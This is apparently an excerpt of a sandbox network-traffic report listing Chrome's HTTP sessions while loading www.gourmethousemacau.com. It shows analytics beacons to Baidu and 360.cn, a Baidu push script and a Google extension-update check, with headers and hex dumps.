                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:50 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 0b 00 0e 03 01 11 00 02 11 01 03 11 01 ff c4 00 77 00 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 08 09 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 10 00 00 04 05 04 02 03 01 00 00 00 00 00 00 00 00 01 02 03 04 11 12 13 05 06 21 14 15 07 00 51 22 32 42 08 11 00 01 02 04 05 02 07 00 00 00 00 00 00 00 00 00 01 11 02 00 21 12 03 f0 31 51 71 04 41 13 81 d1 32 52 62 14 05 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 d4 5b ce 50 e3 1e cd fa 43 0e b7 f5 da 39 5d b7 b0 ed 77 45 72 4b 8b 66 e9 6e 6d 61 6e 4e de 29 bf 54 ea 89 52 a0 02 e8 c5 54 0c 20 73 09 89 4c 4c a4 a8 ab ca 73 39 d7 ad f2 43 1a a4 12 ec 8e 48 44 f6 9f 96 85 6f b8 5a f6 b4 05 05 7c 11 27 0a b5 fb 8f 23 3f f3 23 3e ef 37 4e 22 c7 2e 45 b8 b8 26 38 a3 60 d9 bc 48 52 39 39 54 d3 4a 77 1b 10 21 85 d4 8a c8 6a 64 34 14 a7 23 93 4d 6b f5 39 07 86 fb c4 1a 83 55 14 ea 05 5a a2 4f 6e a9 38 47 d9 77 63 b9 4c f1 3d ba e1 62 9f b4 72 bc 4d ae 9f 35 4f 68 85 3a 5c 5d 38 53 2c 24 a9 f3 87 a9 b5 f7 af 9a f7 a8 ad cb 4e 67 df 16 c0 f7 95 dc da 26 e6 a6 dd 9a 9c fc 5c 63 b6 5b e9 2e 91 84 7e da 42 3f a8 78 32 84 77 a7 2f 9e a2 08 ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedw!Q"2B!1QqA2Rb?[PC9]wErKfnmanN)TRT sLLs9CHDoZ|'#?#>7N".E&8`HR99TJw!jd4#Mk9UZOn8GwcL=brM5Oh:\]8S,$Ng&\c[.~B?x2w/


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              26192.168.2.349719171.8.167.8980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:09.021585941 CET1212OUTGET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbt HTTP/1.1
                                                                                                                                                              Host: s.360.cn
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:09.245266914 CET1239INHTTP/1.1 200 OK
                                                                                                                                                              Server: openresty/1.15.8.2
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Last-Modified: Tue, 23 Jul 2019 07:36:18 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "5d36b8f2-0"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Mar 13, 2023 05:26:09.453898907 CET1326OUTGET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbt HTTP/1.1
                                                                                                                                                              Host: s.360.cn
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:09.685374022 CET1402INHTTP/1.1 200 OK
                                                                                                                                                              Server: openresty/1.15.8.2
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Last-Modified: Tue, 23 Jul 2019 07:36:18 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "5d36b8f2-0"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              27192.168.2.34972239.156.68.16380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:09.120202065 CET1234OUTGET /s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1
                                                                                                                                                              Host: api.share.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:09.377499104 CET1310INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Mar 13, 2023 05:26:09.522027969 CET1362OUTGET /s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1
                                                                                                                                                              Host: api.share.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:09.583272934 CET1372INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Mar 13, 2023 05:26:09.946237087 CET1477INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Mar 13, 2023 05:26:10.151093006 CET1534INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Mar 13, 2023 05:26:10.360213041 CET1542INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              28192.168.2.34972639.156.68.16380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:09.420922041 CET1325OUTGET /push.js HTTP/1.1
                                                                                                                                                              Host: push.zhanzhang.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:09.713474989 CET1404INHTTP/1.1 200 OK
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                              Content-Length: 227
                                                                                                                                                              Content-Type: text/javascript
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Etag: "4078521116"
                                                                                                                                                              Expires: Tue, 12 Mar 2024 04:26:09 GMT
                                                                                                                                                              Last-Modified: Wed, 25 Nov 2015 07:47:55 GMT
                                                                                                                                                              P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                              Server: apache
                                                                                                                                                              Set-Cookie: BAIDUID=2F52D5B2DB20952BB15035AA4130F138:FG=1; max-age=31536000; expires=Tue, 12-Mar-24 04:26:09 GMT; domain=.baidu.com; path=/; version=1
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 65 8f c1 6a c3 30 10 44 7f 25 f1 c1 48 d8 5e f5 da 08 61 42 4f b9 16 72 69 14 8a 2a af 6d 41 2c 99 95 1c 43 db fc 7b ed 9a 9e 7a 59 98 81 79 8f dd b7 93 b7 c9 05 cf f8 d7 dd d0 0e 95 60 97 3e a5 f1 7b 3d f1 7a d0 42 8b 8b a9 3e 8f d5 db 53 f5 ac df 35 5c 0b 0d 1f c6 35 93 06 1b 06 2e 3a 57 92 9a 9d 6f c2 0c b7 60 cd 4a 83 9e b0 2d 83 6a 82 9d 06 f4 09 96 88 44 48 d2 b5 6c 8f 90 30 26 46 7c 73 7a 95 09 61 46 07 b1 37 84 1b 7b 45 8b 08 9d 6b 33 19 6a e6 0b 95 d5 a4 b2 02 bd 0d 0d 9e 5f 4f 2f 61 18 83 5f d0 ec 9f 83 97 94 e7 bf 93 fc b6 4c 16 cd e1 af a8 b7 42 ae da a4 3c ce bb d3 60 3a 94 09 22 59 e5 1f 0f b6 3d c2 e5 0f 97 51 90 77 19 01 00 00
                                                                                                                                                              Data Ascii: ej0D%H^aBOri*mA,C{zYy`>{=zB>S5\5.:Wo`J-jDHl0&F|szaF7{Ek3j_O/a_LB<`:"Y=Qw
                                                                                                                                                              Mar 13, 2023 05:26:09.918997049 CET1461INHTTP/1.1 200 OK
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                              Content-Length: 227
                                                                                                                                                              Content-Type: text/javascript
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Etag: "4078521116"
                                                                                                                                                              Expires: Tue, 12 Mar 2024 04:26:09 GMT
                                                                                                                                                              Last-Modified: Wed, 25 Nov 2015 07:47:55 GMT
                                                                                                                                                              P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                              Server: apache
                                                                                                                                                              Set-Cookie: BAIDUID=2F52D5B2DB20952BB15035AA4130F138:FG=1; max-age=31536000; expires=Tue, 12-Mar-24 04:26:09 GMT; domain=.baidu.com; path=/; version=1
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 65 8f c1 6a c3 30 10 44 7f 25 f1 c1 48 d8 5e f5 da 08 61 42 4f b9 16 72 69 14 8a 2a af 6d 41 2c 99 95 1c 43 db fc 7b ed 9a 9e 7a 59 98 81 79 8f dd b7 93 b7 c9 05 cf f8 d7 dd d0 0e 95 60 97 3e a5 f1 7b 3d f1 7a d0 42 8b 8b a9 3e 8f d5 db 53 f5 ac df 35 5c 0b 0d 1f c6 35 93 06 1b 06 2e 3a 57 92 9a 9d 6f c2 0c b7 60 cd 4a 83 9e b0 2d 83 6a 82 9d 06 f4 09 96 88 44 48 d2 b5 6c 8f 90 30 26 46 7c 73 7a 95 09 61 46 07 b1 37 84 1b 7b 45 8b 08 9d 6b 33 19 6a e6 0b 95 d5 a4 b2 02 bd 0d 0d 9e 5f 4f 2f 61 18 83 5f d0 ec 9f 83 97 94 e7 bf 93 fc b6 4c 16 cd e1 af a8 b7 42 ae da a4 3c ce bb d3 60 3a 94 09 22 59 e5 1f 0f b6 3d c2 e5 0f 97 51 90 77 19 01 00 00
                                                                                                                                                              Data Ascii: ej0D%H^aBOri*mA,C{zYy`>{=zB>S5\5.:Wo`J-jDHl0&F|szaF7{Ek3j_O/a_LB<`:"Y=Qw


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              29192.168.2.34972439.156.68.16380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:09.722276926 CET1424OUTGET /s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1
                                                                                                                                                              Host: api.share.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:09.990808010 CET1485INHTTP/1.1 200 OK
                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                              Content-Length: 23
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Server: bfe
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Mar 13, 2023 05:26:10.011656046 CET1496OUTGET /s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1
                                                                                                                                                              Host: api.share.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:10.190525055 CET1534INHTTP/1.1 200 OK
                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                              Content-Length: 23
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Server: bfe
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Mar 13, 2023 05:26:10.273279905 CET1534INHTTP/1.1 200 OK
                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                              Content-Length: 23
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Server: bfe
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:10 GMT
                                                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 01 00 00 ff ff 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Mar 13, 2023 05:26:29.656362057 CET2742OUTGET /s.gif?l=http://www.gourmethousemacau.com/Index.asp HTTP/1.1
                                                                                                                                                              Host: api.share.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:29.927366018 CET2744INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:29 GMT
                                                                                                                                                              Mar 13, 2023 05:26:30.181509972 CET2748INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:29 GMT
                                                                                                                                                              Mar 13, 2023 05:26:35.228157043 CET2756OUTGET /s.gif?l=http://www.gourmethousemacau.com/Index.asp HTTP/1.1
                                                                                                                                                              Host: api.share.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:35.481095076 CET2758INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:35 GMT
                                                                                                                                                              Mar 13, 2023 05:26:35.735598087 CET2761INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:35 GMT


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              3192.168.2.349714104.192.108.23443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              30192.168.2.349813171.8.167.8980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:30.004465103 CET2745OUTGET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.duba HTTP/1.1
                                                                                                                                                              Host: s.360.cn
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:30.264789104 CET2749INHTTP/1.1 200 OK
                                                                                                                                                              Server: openresty/1.15.8.2
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:30 GMT
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Last-Modified: Mon, 29 Oct 2018 06:07:11 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "5bd6a38f-0"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Mar 13, 2023 05:26:35.276731968 CET2756OUTGET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2FIndex.asp&sid=d182b3f28525f2db83acfaaf6e696dba&token=dp1s8a2.bx3efd2n8I5/2m5ofc2.duba HTTP/1.1
                                                                                                                                                              Host: s.360.cn
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Mar 13, 2023 05:26:35.530268908 CET2758INHTTP/1.1 200 OK
                                                                                                                                                              Server: openresty/1.15.8.2
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:35 GMT
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Last-Modified: Mon, 29 Oct 2018 06:07:11 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "5bd6a38f-0"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              31192.168.2.34972839.156.68.16380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:54.630259037 CET3078OUTData Raw: 00
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              4192.168.2.34971565.9.25.112443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              5192.168.2.349717103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              6192.168.2.349727104.193.88.123443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              7192.168.2.349718171.8.167.89443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              8192.168.2.349731104.193.88.123443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              9192.168.2.349738103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.349699142.250.203.110443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:04 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                              Host: clients2.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              X-Goog-Update-Interactivity: fg
                                                                                                                                                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                                                                                              X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:04 UTC1INHTTP/1.1 200 OK
                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bQw3OfhMAsDckSYBFwuj0w' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:04 GMT
                                                                                                                                                              Content-Type: text/xml; charset=UTF-8
                                                                                                                                                              X-Daynum: 5914
                                                                                                                                                              X-Daystart: 73564
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              Server: GSE
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Connection: close
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              2023-03-13 04:26:04 UTC1INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 39 31 34 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 37 33 35 36 34 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                              Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5914" elapsed_seconds="73564"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                              2023-03-13 04:26:04 UTC2INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                                                                                                                              Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                                                                                                                              2023-03-13 04:26:04 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.349700142.250.203.109443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
